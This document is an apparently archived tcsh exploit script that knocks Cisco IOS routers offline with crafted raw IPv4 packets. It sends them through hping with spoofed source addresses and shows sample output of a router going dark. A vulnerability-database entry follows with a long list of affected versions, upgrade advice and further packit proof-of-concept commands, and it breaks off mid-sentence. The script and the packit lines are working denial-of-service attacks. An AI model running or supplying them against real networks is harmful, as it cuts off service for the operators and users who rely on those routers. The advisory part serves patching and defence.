#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
# 
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example : 
# 
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org 
#

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end

# milw0rm.com [2003-07-22]
		

- Vulnerability Information

2325
Cisco IOS Malformed IPv4 Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted sequence of IPv4 packets is sent to an interface of the device, and results in loss of availability for the interface.

- Timeline

2003-07-17 2003-07-17
Unknown Unknown

- Solution

Upgrade to version indicated by the Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Cisco IOS Malicious IPV4 Packet Sequence Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8211
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
This vulnerability was announced by the vendor.

- Affected Software Versions

Cisco ONS 15454 Optical Transport Platform 4.0 (1)
Cisco ONS 15454 Optical Transport Platform 4.0
Cisco ONS 15454 Optical Transport Platform 3.4
Cisco ONS 15454 Optical Transport Platform 3.3
Cisco ONS 15454 Optical Transport Platform 3.2 .0
Cisco ONS 15454 Optical Transport Platform 3.1 .0
Cisco ONS 15454 Optical Transport Platform 3.0
Cisco IOS 12.2 12.2XU
Cisco IOS 12.0.19
Cisco IOS 12.0.7 (T)
Cisco IOS 12.0.7
Cisco IOS 12.0.6
Cisco IOS 12.0.5
Cisco IOS 12.0.4 T
Cisco IOS 12.0.4 S
Cisco IOS 12.0.4
Cisco IOS 12.0.3 T2
Cisco IOS 12.0.3
Cisco IOS 12.0.2 XG
Cisco IOS 12.0.2 XF
Cisco IOS 12.0.2 XD
Cisco IOS 12.0.2 XC
Cisco IOS 12.0.2
Cisco IOS 12.0.1 XE
Cisco IOS 12.0.1 XB
Cisco IOS 12.0.1 XA3
Cisco IOS 12.0.1 W
Cisco IOS 12.0.1
Cisco IOS 11.3.11 b
Cisco IOS 11.3.1 T
Cisco IOS 11.3.1 ED
Cisco IOS 11.3.1
Cisco IOS 11.2.10 BC
Cisco IOS 11.2.10
Cisco IOS 11.2.9 XA
Cisco IOS 11.2.9 P
Cisco IOS 11.2.8 SA5
Cisco IOS 11.2.8 SA3
Cisco IOS 11.2.8 SA1
Cisco IOS 11.2.8 P
Cisco IOS 11.2.8
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.17 CT
Cisco IOS 11.1.17 CC
Cisco IOS 11.1.16 IA
Cisco IOS 11.1.16 AA
Cisco IOS 11.1.16
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.13 IA
Cisco IOS 11.1.13 CA
Cisco IOS 11.1.13 AA
Cisco IOS 11.1.13
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.20 .3
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 11.0.12
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco IOS 10.3.4 .3
Cisco IOS 10.3.4 .2
Cisco IOS 10.3.3 .4
Cisco IOS 10.3.3 .3
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2ZE
Cisco IOS 12.2ZE
Cisco IOS 12.2ZD
Cisco IOS 12.2ZC
Cisco IOS 12.2ZC
Cisco IOS 12.2ZB
Cisco IOS 12.2ZA
Cisco IOS 12.2ZA
Cisco IOS 12.2YZ
Cisco IOS 12.2YZ
Cisco IOS 12.2YY
Cisco IOS 12.2YY
Cisco IOS 12.2YX
Cisco IOS 12.2YX
Cisco IOS 12.2YW
Cisco IOS 12.2YW
Cisco IOS 12.2YV
Cisco IOS 12.2YU
Cisco IOS 12.2YU
Cisco IOS 12.2YT
Cisco IOS 12.2YS
Cisco IOS 12.2YR
Cisco IOS 12.2YR
Cisco IOS 12.2YQ
Cisco IOS 12.2YP
Cisco IOS 12.2YP
Cisco IOS 12.2YO
Cisco IOS 12.2YN
Cisco IOS 12.2YM
Cisco IOS 12.2YL
Cisco IOS 12.2YL
Cisco IOS 12.2YK
Cisco IOS 12.2YK
Cisco IOS 12.2YJ
Cisco IOS 12.2YH
Cisco IOS 12.2YG
Cisco IOS 12.2YF
Cisco IOS 12.2YD
Cisco IOS 12.2YC
Cisco IOS 12.2YB
Cisco IOS 12.2YA
Cisco IOS 12.2XW
Cisco IOS 12.2XT
Cisco IOS 12.2XS
Cisco IOS 12.2XR
Cisco IOS 12.2XQ
Cisco IOS 12.2XQ
Cisco IOS 12.2XN
Cisco IOS 12.2XM
Cisco IOS 12.2XL
Cisco IOS 12.2XK
Cisco IOS 12.2XK
Cisco IOS 12.2XK
Cisco IOS 12.2XJ
Cisco IOS 12.2XJ
Cisco IOS 12.2XI
Cisco IOS 12.2XH
Cisco IOS 12.2XG
Cisco IOS 12.2XF
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XC
Cisco IOS 12.2XB
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2SZ
Cisco IOS 12.2SY
Cisco IOS 12.2SY
Cisco IOS 12.2SX
Cisco IOS 12.2S
Cisco IOS 12.2PI
Cisco IOS 12.2PB
Cisco IOS 12.2MX
Cisco IOS 12.2MX
Cisco IOS 12.2MC
Cisco IOS 12.2MB
Cisco IOS 12.2JA
Cisco IOS 12.2DX
Cisco IOS 12.2DD
Cisco IOS 12.2DA
Cisco IOS 12.2CY
Cisco IOS 12.2CY
Cisco IOS 12.2CX
Cisco IOS 12.2CX
Cisco IOS 12.2BZ
Cisco IOS 12.2BY
Cisco IOS 12.2BX
Cisco IOS 12.2BW
Cisco IOS 12.2BW
Cisco IOS 12.2BC
Cisco IOS 12.2B
Cisco IOS 12.2(9)S
Cisco IOS 12.2(8)T
Cisco IOS 12.2(8)BC1
Cisco IOS 12.2(7a)
Cisco IOS 12.2(7.4)S
Cisco IOS 12.2(7)DA
Cisco IOS 12.2(7)
Cisco IOS 12.2(6c)
Cisco IOS 12.2(6.8)T1a
Cisco IOS 12.2(6.8)T0a
Cisco IOS 12.2(5d)
Cisco IOS 12.2(5)CA1
Cisco IOS 12.2(5)
Cisco IOS 12.2(4)YB
Cisco IOS 12.2(4)YA1
Cisco IOS 12.2(4)YA
Cisco IOS 12.2(4)XW1
Cisco IOS 12.2(4)XW
Cisco IOS 12.2(4)XM2
Cisco IOS 12.2(4)XM
Cisco IOS 12.2(4)XL4
Cisco IOS 12.2(4)XL
Cisco IOS 12.2(4)T3
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)MX1
Cisco IOS 12.2(4)MX
Cisco IOS 12.2(4)MB3
Cisco IOS 12.2(4)BX
Cisco IOS 12.2(4)BX
Cisco IOS 12.2(4)BC1a
Cisco IOS 12.2(4)BC1
Cisco IOS 12.2(4)B4
Cisco IOS 12.2(4)B3
Cisco IOS 12.2(4)B2
Cisco IOS 12.2(4)B1
Cisco IOS 12.2(4)B
Cisco IOS 12.2(4)
Cisco IOS 12.2(3d)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2.2)T
Cisco IOS 12.2(2)YC
Cisco IOS 12.2(2)XU2
Cisco IOS 12.2(2)XU
Cisco IOS 12.2(2)XT3
Cisco IOS 12.2(2)XT
Cisco IOS 12.2(2)XN
Cisco IOS 12.2(2)XK2
Cisco IOS 12.2(2)XK
Cisco IOS 12.2(2)XJ1
Cisco IOS 12.2(2)XJ
Cisco IOS 12.2(2)XI2
Cisco IOS 12.2(2)XI1
Cisco IOS 12.2(2)XI
Cisco IOS 12.2(2)XH3
Cisco IOS 12.2(2)XH2
Cisco IOS 12.2(2)XH
Cisco IOS 12.2(2)XG
Cisco IOS 12.2(2)XF
Cisco IOS 12.2(2)XB4
Cisco IOS 12.2(2)XB3
Cisco IOS 12.2(2)XB
Cisco IOS 12.2(2)XA5
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)T4
Cisco IOS 12.2(2)DD3
Cisco IOS 12.2(2)BY2
Cisco IOS 12.2(2)BY
Cisco IOS 12.2(2)BY
Cisco IOS 12.2(2)BX
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1d)
Cisco IOS 12.2(1b)DA1
Cisco IOS 12.2(1b)
Cisco IOS 12.2(13.03)B
Cisco IOS 12.2(13)T1
Cisco IOS 12.2(12.05)T
Cisco IOS 12.2(12.05)S
Cisco IOS 12.2(12.05)
Cisco IOS 12.2(12.02)T
Cisco IOS 12.2(12.02)S
Cisco IOS 12.2(11)T3
Cisco IOS 12.2(11)T
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1.1)
Cisco IOS 12.2(1)XS1
Cisco IOS 12.2(1)XS
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE3
Cisco IOS 12.2(1)XE2
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD4
Cisco IOS 12.2(1)XD3
Cisco IOS 12.2(1)XD1
Cisco IOS 12.2(1)XD1
Cisco IOS 12.2(1)XD
Cisco IOS 12.2(1)XA
Cisco IOS 12.2(1)DX
Cisco IOS 12.2(1)
Cisco IOS 12.2
Cisco IOS 12.1YJ
Cisco IOS 12.1YI
Cisco IOS 12.1YH
Cisco IOS 12.1YF
Cisco IOS 12.1YE
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1T
Cisco IOS 12.1M
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EW
Cisco IOS 12.1EV
Cisco IOS 12.1EC
Cisco IOS 12.1EB
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AY
Cisco IOS 12.1AX
Cisco IOS 12.1AX
Cisco IOS 12.1AA
Cisco IOS 12.10S
Cisco IOS 12.1(9a)
Cisco IOS 12.1(9)EX3
Cisco IOS 12.1(9)EX
Cisco IOS 12.1(9)E3
Cisco IOS 12.1(9)E
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8c)
Cisco IOS 12.1(8b)EX4
Cisco IOS 12.1(8b)E9
Cisco IOS 12.1(8b)E8
Cisco IOS 12.1(8a)EX
Cisco IOS 12.1(8a)EW1
Cisco IOS 12.1(8a)EW
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(8)EA2b
Cisco IOS 12.1(8)EA1b
Cisco IOS 12.1(8)E
Cisco IOS 12.1(8)AA1
Cisco IOS 12.1(8)
Cisco IOS 12.1(7b)
Cisco IOS 12.1(7a)EY3
Cisco IOS 12.1(7a)EY
Cisco IOS 12.1(7a)E6
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)DA3
Cisco IOS 12.1(7)DA2
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(7)
Cisco IOS 12.1(6a)
Cisco IOS 12.1(6.5)EC3
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EZ1
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(6)EA2c
Cisco IOS 12.1(6)EA2b
Cisco IOS 12.1(6)EA2a
Cisco IOS 12.1(6)EA2
Cisco IOS 12.1(6)EA1a
Cisco IOS 12.1(6)EA1
Cisco IOS 12.1(6)E8
Cisco IOS 12.1(5e)
Cisco IOS 12.1(5c)EX
Cisco IOS 12.1(5c)E12
Cisco IOS 12.1(5)YI1
Cisco IOS 12.1(5)YI
Cisco IOS 12.1(5)YH3
Cisco IOS 12.1(5)YH
Cisco IOS 12.1(5)YF4
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YF
Cisco IOS 12.1(5)YD6
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YD
Cisco IOS 12.1(5)YC2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YC
Cisco IOS 12.1(5)YB5
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)YB
Cisco IOS 12.1(5)YA2
Cisco IOS 12.1(5)YA
Cisco IOS 12.1(5)XY6
Cisco IOS 12.1(5)XV5
Cisco IOS 12.1(5)XV4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XV
Cisco IOS 12.1(5)XU1
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XS
Cisco IOS 12.1(5)XR2
Cisco IOS 12.1(5)XM7
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)XM
Cisco IOS 12.1(5)XG5
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(5)T12
Cisco IOS 12.1(5)T
Cisco IOS 12.1(5)EY
Cisco IOS 12.1(5)DC2
Cisco IOS 12.1(5)DC
Cisco IOS 12.1(5)DB1
Cisco IOS 12.1(5)DA1
Cisco IOS 12.1(4a)
Cisco IOS 12.1(4.3)T
Cisco IOS 12.1(4)XZ7
Cisco IOS 12.1(4)XZ
Cisco IOS 12.1(4)XM4
Cisco IOS 12.1(4)EA1e
Cisco IOS 12.1(4)E3
Cisco IOS 12.1(4)DC2
Cisco IOS 12.1(4)DC
Cisco IOS 12.1(4)DB2
Cisco IOS 12.1(4)DB1
Cisco IOS 12.1(4)DB
Cisco IOS 12.1(4)
Cisco IOS 12.1(3b)
Cisco IOS 12.1(3a)XI8
Cisco IOS 12.1(3a)E8
Cisco IOS 12.1(3a)E7
Cisco IOS 12.1(3)XT3
Cisco IOS 12.1(3)XT
Cisco IOS 12.1(3)XQ
Cisco IOS 12.1(3)XP4
Cisco IOS 12.1(3)XP
Cisco IOS 12.1(3)XI
Cisco IOS 12.1(3)DC2
Cisco IOS 12.1(3)DB1
Cisco IOS 12.1(2b)
Cisco IOS 12.1(2)XF5
Cisco IOS 12.1(2)XF4
Cisco IOS 12.1(2)XF
Cisco IOS 12.1(2)E1
Cisco IOS 12.1(1c)
Cisco IOS 12.1(1a)T1
Cisco IOS 12.1(13.4)E
Cisco IOS 12.1(13)
Cisco IOS 12.1(12c)EC
Cisco IOS 12.1(12b)
Cisco IOS 12.1(12)E
Cisco IOS 12.1(11b)E
Cisco IOS 12.1(11b)
Cisco IOS 12.1(11)EC
Cisco IOS 12.1(11)EA1
Cisco IOS 12.1(11)E
Cisco IOS 12.1(11)
Cisco IOS 12.1(10a)
Cisco IOS 12.1(10)EY
Cisco IOS 12.1(10)EX
Cisco IOS 12.1(10)EC1
Cisco IOS 12.1(10)E4
Cisco IOS 12.1(10)E
Cisco IOS 12.1(10)AA
Cisco IOS 12.1(1.3)T
Cisco IOS 12.1(1)T
Cisco IOS 12.1(1)EX
Cisco IOS 12.1(1)E5
Cisco IOS 12.1(1)DC2
Cisco IOS 12.1(1)DC
Cisco IOS 12.1(1)DB2
Cisco IOS 12.1(1)DB
Cisco IOS 12.1(1)
Cisco IOS 12.1
Cisco IOS 12.0XW
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XK
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WX
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0WC
Cisco IOS 12.0WC
Cisco IOS 12.0W5
Cisco IOS 12.0T
Cisco IOS 12.0SZ
Cisco IOS 12.0SY
Cisco IOS 12.0SX
Cisco IOS 12.0ST
Cisco IOS 12.0SP
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0(9a)
Cisco IOS 12.0(9)S8
Cisco IOS 12.0(9)S
Cisco IOS 12.0(9)
Cisco IOS 12.0(8a)
Cisco IOS 12.0(8.3)SC
Cisco IOS 12.0(8.0.2)S
Cisco IOS 12.0(8)S1
Cisco IOS 12.0(8)S1
Cisco IOS 12.0(8)
Cisco IOS 12.0(7a)
Cisco IOS 12.0(7.4)S
Cisco IOS 12.0(7)XV
Cisco IOS 12.0(7)XK3
Cisco IOS 12.0(7)XK
Cisco IOS 12.0(7)XF1
Cisco IOS 12.0(7)XF
Cisco IOS 12.0(7)XE2
Cisco IOS 12.0(7)XE
Cisco IOS 12.0(7)WX5(15a)
Cisco IOS 12.0(7)T2
Cisco IOS 12.0(7)T
Cisco IOS 12.0(7)SC
Cisco IOS 12.0(7)S1
Cisco IOS 12.0(7)DC1
Cisco IOS 12.0(7)DB2
Cisco IOS 12.0(6b)
Cisco IOS 12.0(5.4)WC1
Cisco IOS 12.0(5.3)WC1
Cisco IOS 12.0(5.2)XU
Cisco IOS 12.0(5.1)XP
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)XU
Cisco IOS 12.0(5)XS?
Cisco IOS 12.0(5)XS
Cisco IOS 12.0(5)XN1
Cisco IOS 12.0(5)XN
Cisco IOS 12.0(5)XK2
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(5)XE?
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)WX
Cisco IOS 12.0(5)WC3b
Cisco IOS 12.0(5)WC3
Cisco IOS 12.0(5)WC3
Cisco IOS 12.0(5)WC2b
Cisco IOS 12.0(5)WC2b
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC 2900XL-LRE
Cisco IOS 12.0(5)T1
Cisco IOS 12.0(5)T
Cisco IOS 12.0(4)XM1
Cisco IOS 12.0(4)XM
Cisco IOS 12.0(4)XE1
Cisco IOS 12.0(4)XE
Cisco IOS 12.0(3d)
Cisco IOS 12.0(3)XE
Cisco IOS 12.0(3)
Cisco IOS 12.0(2b)
Cisco IOS 12.0(21a)
Cisco IOS 12.0(21)SX
Cisco IOS 12.0(21)ST
Cisco IOS 12.0(21)S3
Cisco IOS 12.0(21)S1
Cisco IOS 12.0(21)S
Cisco IOS 12.0(20a)
Cisco IOS 12.0(20.4)SP
Cisco IOS 12.0(20)W5(22b)
Cisco IOS 12.0(20)W5(22b)
Cisco IOS 12.0(20)SX
Cisco IOS 12.0(20)ST2
Cisco IOS 12.0(20)SP1
Cisco IOS 12.0(2)XE?
Cisco IOS 12.0(2)XE
Cisco IOS 12.0(19a)
Cisco IOS 12.0(19)ST2
Cisco IOS 12.0(19)ST
Cisco IOS 12.0(19)SL4
Cisco IOS 12.0(19)S2
Cisco IOS 12.0(19)S
Cisco IOS 12.0(18b)
Cisco IOS 12.0(18)W5(22b)
Cisco IOS 12.0(18)W5(22b)
Cisco IOS 12.0(18)ST1
Cisco IOS 12.0(18)S5
Cisco IOS 12.0(18)S
Cisco IOS 12.0(17a)
Cisco IOS 12.0(17)ST5
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL6
Cisco IOS 12.0(17)SL2
Cisco IOS 12.0(17)S4
Cisco IOS 12.0(17)S
Cisco IOS 12.0(17)
Cisco IOS 12.0(16a)
Cisco IOS 12.0(16.06)S
Cisco IOS 12.0(16)W5(21)
Cisco IOS 12.0(16)ST1
Cisco IOS 12.0(16)SC3
Cisco IOS 12.0(16)S8
Cisco IOS 12.0(15a)
Cisco IOS 12.0(15)S6
Cisco IOS 12.0(15)S3
Cisco IOS 12.0(14a)
Cisco IOS 12.0(14)W5(20)
Cisco IOS 12.0(14)ST3
Cisco IOS 12.0(14)ST
Cisco IOS 12.0(14)S7
Cisco IOS 12.0(13a)
Cisco IOS 12.0(13)WT6(1)
Cisco IOS 12.0(13)W5(19c)
Cisco IOS 12.0(13)S6
Cisco IOS 12.0(12a)
Cisco IOS 12.0(12)S3
Cisco IOS 12.0(12)S3
Cisco IOS 12.0(11a)
Cisco IOS 12.0(11)ST4
Cisco IOS 12.0(11)S6
Cisco IOS 12.0(10a)
Cisco IOS 12.0(10)W5(18g)
Cisco IOS 12.0(10)W5(18f)
Cisco IOS 12.0(10)W5
Cisco IOS 12.0(10)S7
Cisco IOS 12.0(1)ST
Cisco IOS 12.0(1)S
Cisco IOS 12.0(1)S
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3WA4
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3(8)DB2
Cisco IOS 11.3(7)DB1
Cisco IOS 11.3(2)XA
Cisco IOS 11.3(11c)
Cisco IOS 11.3(11b)T2
Cisco IOS 11.3(11b)
Cisco IOS 11.3
Cisco IOS 11.2XA
Cisco IOS 11.2WA4
Cisco IOS 11.2WA3
Cisco IOS 11.2SA
Cisco IOS 11.2P
Cisco IOS 11.2GS
Cisco IOS 11.2F
Cisco IOS 11.2BC
Cisco IOS 11.2(9)XA
Cisco IOS 11.2(8.9)SA6
Cisco IOS 11.2(4)XAf
Cisco IOS 11.2(4)XA
Cisco IOS 11.2(4)
Cisco IOS 11.2(26b)
Cisco IOS 11.2(26a)
Cisco IOS 11.2(26)P2
Cisco IOS 11.2(26)P2
Cisco IOS 11.2(23a)BC1
Cisco IOS 11.2(19a)GS6
Cisco IOS 11.2(19)GS0.2
Cisco IOS 11.2(17)
Cisco IOS 11.2(11b)T2
Cisco IOS 11.2
Cisco IOS 11.1IA
Cisco IOS 11.1CT
Cisco IOS 11.1CC
Cisco IOS 11.1CA
Cisco IOS 11.1AA
Cisco IOS 11.1(36)CC4
Cisco IOS 11.1(36)CC2
Cisco IOS 11.1(36)CA2
Cisco IOS 11.1(28a)IA
Cisco IOS 11.1(28a)CT
Cisco IOS 11.1(24b)
Cisco IOS 11.1(24a)
Cisco IOS 11.1(20)AA4
Cisco IOS 11.1
Cisco IOS 11.0(22b)
Cisco IOS 11.0(22a)
Cisco IOS 11.0(18)
Cisco IOS 11.0
Cisco IOS 11.0
Cisco IOS 10.3

- Unaffected versions

Cisco ONS 15454 Optical Transport Platform 4.1
Cisco IOS 12.3(1a)
Cisco IOS 12.3
Cisco IOS 12.2ZL
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2T
Cisco IOS 12.2DA
Cisco IOS 12.2(8)ZB7
Cisco IOS 12.2(8)YY3
Cisco IOS 12.2(8)YY
Cisco IOS 12.2(8)YW2
Cisco IOS 12.2(8)YD
Cisco IOS 12.2(8)T10
Cisco IOS 12.2(4)T6
Cisco IOS 12.2(4)MB12
Cisco IOS 12.2(2)YC
Cisco IOS 12.2(2)XB11
Cisco IOS 12.2(17)
Cisco IOS 12.2(17)
Cisco IOS 12.2(16.5)S
Cisco IOS 12.2(16)BX
Cisco IOS 12.2(16)B1
Cisco IOS 12.2(15)ZL
Cisco IOS 12.2(15)ZJ1
Cisco IOS 12.2(15)YS/1.2(1)
Cisco IOS 12.2(15)T5
Cisco IOS 12.2(15)BC1
Cisco IOS 12.2(14)ZA2
Cisco IOS 12.2(14)SZ2
Cisco IOS 12.2(14)SY1
Cisco IOS 12.2(14)SX1
Cisco IOS 12.2(13)ZH
Cisco IOS 12.2(13)ZC
Cisco IOS 12.2(13)MC1
Cisco IOS 12.2(12)DA3
Cisco IOS 12.2(11)YZ2
Cisco IOS 12.2(11)YX1
Cisco IOS 12.2(11)YP1
Cisco IOS 12.2(11)T9
Cisco IOS 12.2(11)JA
Cisco IOS 12.2(11)BC3c
Cisco IOS 12.2(10)DA2
Cisco IOS 12.2
Cisco IOS 12.1(8b)E14
Cisco IOS 12.1(6)E12
Cisco IOS 12.1(5)T15
Cisco IOS 12.1(20)
Cisco IOS 12.1(19)EW
Cisco IOS 12.1(19)EC
Cisco IOS 12.1(19)E
Cisco IOS 12.1(18.4)
Cisco IOS 12.1(15)BC1
Cisco IOS 12.1(14)EB
Cisco IOS 12.1(14)EA1
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(13)EX2
Cisco IOS 12.1(13)EW
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E7
Cisco IOS 12.1(13)AY
Cisco IOS 12.1(12c)EV01
Cisco IOS 12.1(12c)E7
Cisco IOS 12.1(11b)E12
Cisco IOS 12.1
Cisco IOS 12.1
Cisco IOS 12.0T
Cisco IOS 12.0(7)T3
Cisco IOS 12.0(26)W5(28a)
Cisco IOS 12.0(26)W5(28)
Cisco IOS 12.0(26)
Cisco IOS 12.0(25)W5(27)
Cisco IOS 12.0(25)S1
Cisco IOS 12.0(24)S2
Cisco IOS 12.0(23)S3
Cisco IOS 12.0(22)S5
Cisco IOS 12.0(21)ST7
Cisco IOS 12.0(21)S7
Cisco IOS 12.0(21)S5a
Cisco IOS 12.0(21)S4a
Cisco IOS 12.0(20)ST6
Cisco IOS 12.0(19)ST6
Cisco IOS 12.0(19)S4
Cisco IOS 12.0(19)S2a
Cisco IOS 12.0(18)S7
Cisco IOS 12.0(18)S5a
Cisco IOS 12.0(17)ST8
Cisco IOS 12.0(17)SL9
Cisco IOS 12.0(17)S7
Cisco IOS 12.0(16)S8a
Cisco IOS 12.0(16)S10
Cisco IOS 12.0(15)S7
Cisco IOS 12.0(14)S8
Cisco IOS 12.0(13)S8
Cisco IOS 12.0(12)S4
Cisco IOS 12.0(10)S8
Cisco IOS 12.0(10)S3b
Cisco IOS 12.0(05)WC9
Cisco IOS 11.3(11d)
Cisco IOS 11.2(26e)
Cisco IOS 11.2(26)P5
Cisco IOS 11.2(15b)
Cisco IOS 11.1(36)CA4
Cisco IOS 11.1(24c)

- Vulnerability discussion

A denial of service vulnerability has been reported in all hardware platforms that run Cisco IOS versions 11.x through 12.x. The issue may be triggered by a sequence of specifically crafted IPv4 packets. An affected device must be power cycled to regain normal functionality.

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

This issue can be exploited with utilities such as hping, so specific exploit code is not required to exploit this issue.

The following proof-of-concept has been provided to reproduce the vulnerability using packit 0.6.0d and later:
packit -t RAWIP -V 53 -d dst_ip -T ttl
packit -t RAWIP -V 55 -d dst_ip -T ttl
packit -t RAWIP -V 77 -d dst_ip -T ttl
packit -t RAWIP -V 103 -d dst_ip -T ttl

The following shell script has been made available by Pat Donahue:

---
